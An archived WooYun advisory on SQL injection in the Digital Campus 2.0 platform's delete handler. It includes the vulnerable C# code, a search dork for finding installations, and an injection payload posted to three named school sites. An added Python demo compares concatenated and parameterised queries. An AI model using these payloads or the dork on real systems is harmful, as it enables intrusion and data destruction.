WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles online--------http://drop.zone.ci/
2015-03-17: Details reported to the vendor, awaiting vendor response
2015-03-20: Vendor confirmed; details disclosed to the vendor only
2015-03-23: Details opened to third-party security partners
2015-05-14: Details opened to core white hats and domain experts
2015-05-24: Details opened to ordinary white hats
2015-06-03: Details opened to intern white hats
2015-06-18: Details disclosed to the public
As in the title.
Search keyword: intitle:数字校园平台—Digital Campus2.0 Platform
File: code/application/book/syscommontypemain.aspx, partial code:
private void DoCmd(string Method)
{
    if (Method == null)
        return;
    if (Method == "add")
        this.AddSysCommonType();
    else if (Method == "edit")
        this.Edit();
    else if (Method == "check")
        this.SysCommonTypeNameIsOk();
    else if (Method == "del")
        this.DeletSysCommonType();   // ?Method=del dispatches to the delete handler below
    else if (Method == "checkNum")
        this.CHECKNUM();
}
Key code:
public void DeletSysCommonType()
{
    SysCommonTypeManager sysCommonTypeManager = new SysCommonTypeManager();
    // Read straight from the POST body; no validation or escaping of either value
    string text = (base.Request.Form["SCTID"] == null) ? "" : base.Request.Form["SCTID"].ToString();
    string text2 = (base.Request.Form["ParentID"] == null) ? "" : base.Request.Form["ParentID"].ToString();
    string text3 = base.Request.Form["notes"];
    if (text != null && text.Length > 0 && text2 != null)
    {
        BaseDBCon baseDBCon = new BaseDBCon();
        baseDBCon.Open();
        // SCTID reaches the database layer as-is
        int num = sysCommonTypeManager.DeleParenID(baseDBCon, text);
        if (num == 0)
        {
            sysCommonTypeManager.DeleRole(baseDBCon, text);
            // ParentID reaches the database layer as-is
            int num2 = sysCommonTypeManager.DeleParenID(baseDBCon, text2);
            if (num2 == 0)
            {
                sysCommonTypeManager.UpDateRole(baseDBCon, text2);
            }
            base.Response.Write("{success:'true'}");
        }
        else
        {
            base.Response.Write("{success:'Exception'}");
        }
        baseDBCon.Close();
    }
    else
    {
        base.Response.Write("{success:'Exception'}");
    }
}
string text = (base.Request.Form["SCTID"] == null) ? "" : base.Request.Form["SCTID"].ToString();
string text2 = (base.Request.Form["ParentID"] == null) ? "" : base.Request.Form["ParentID"].ToString();
// SCTID and ParentID are taken into the query here without any filtering.
Case 1:
http://www.jszx.cn/code/application/book/syscommontypemain.aspx?Method=del
POST body:
SCTID=1' and 1=@@version and '1'='1&ParentID=1&notes=1
Case 2:
http://www.tzby.net/code/application/book/syscommontypemain.aspx?Method=del
Case 3:
http://www.lhdtxx.com/code/application/book/syscommontypemain.aspx?Method=del
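The three cases above post the same body to the del handler. The following is an added example, not code from this report or from the Digital Campus product, that reproduces the underlying pattern in Python against an in-memory SQLite table: a DELETE whose WHERE clause is built by string concatenation, as the handler does, next to the parameterised form. The table name and columns are assumptions, since the page shows the handler but not the SQL behind DeleParenID. The report's payload uses 1=@@version to make SQL Server convert its version string to an integer, and the resulting conversion error leaks the version; SQLite has no @@version, so the example substitutes plain true and false conditions to show the boolean oracle, plus a tautology to show the destructive effect on a DELETE.

```python
import sqlite3

# Constructed sample data standing in for the product's table (schema assumed;
# the page shows only the handler, not the SQL it runs).
SAMPLE_ROWS = [
    ("1", "0", "top-level type"),
    ("2", "0", "another top-level type"),
    ("3", "1", "child of type 1"),
]


def fresh_db():
    """Fresh in-memory database so every call starts from the same three rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE SysCommonType (SCTID TEXT, ParentID TEXT, Name TEXT)")
    conn.executemany("INSERT INTO SysCommonType VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def delete_children_concat(parent_id):
    """Vulnerable: the POST value is spliced into the SQL text, the way the
    handler hands Form["SCTID"] / Form["ParentID"] to DeleParenID.
    Returns the number of rows deleted."""
    conn = fresh_db()
    sql = "DELETE FROM SysCommonType WHERE ParentID='" + parent_id + "'"
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def delete_children_param(parent_id):
    """Hardened: the value travels as a bound parameter and is never parsed as SQL."""
    conn = fresh_db()
    cur = conn.execute("DELETE FROM SysCommonType WHERE ParentID=?", (parent_id,))
    conn.commit()
    return cur.rowcount


# The boolean oracle from the report, with a SQLite-friendly condition in place of
# 1=@@version. The true and false variants behave differently only when the value
# is concatenated into the statement.
PAYLOAD_TRUE = "1' and 1=1 and '1'='1"
PAYLOAD_FALSE = "1' and 1=2 and '1'='1"
# Tautology: with concatenation the WHERE clause matches every row.
PAYLOAD_TAUTOLOGY = "1' or '1'='1"


def oracle_distinguishes(delete_fn):
    """True if an attacker can tell the two payloads apart through delete_fn,
    i.e. if the injected condition changes what the statement does."""
    return delete_fn(PAYLOAD_TRUE) != delete_fn(PAYLOAD_FALSE)


if __name__ == "__main__":
    for fn in (delete_children_concat, delete_children_param):
        print(fn.__name__,
              "true:", fn(PAYLOAD_TRUE),
              "false:", fn(PAYLOAD_FALSE),
              "tautology:", fn(PAYLOAD_TAUTOLOGY),
              "oracle:", oracle_distinguishes(fn))
```

With concatenation the true payload deletes the one child of type 1, the false payload deletes nothing, and the tautology wipes all three rows; with the bound parameter none of the three payloads matches any row because the whole string is compared as a literal ParentID. The same distinction is what makes the report's POST body a working test: a version-dependent response means the quote broke out of the string.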
Filter the input.
Severity: High
Vulnerability Rank: 12
Confirmation time: 2015-03-20 17:41
None yet.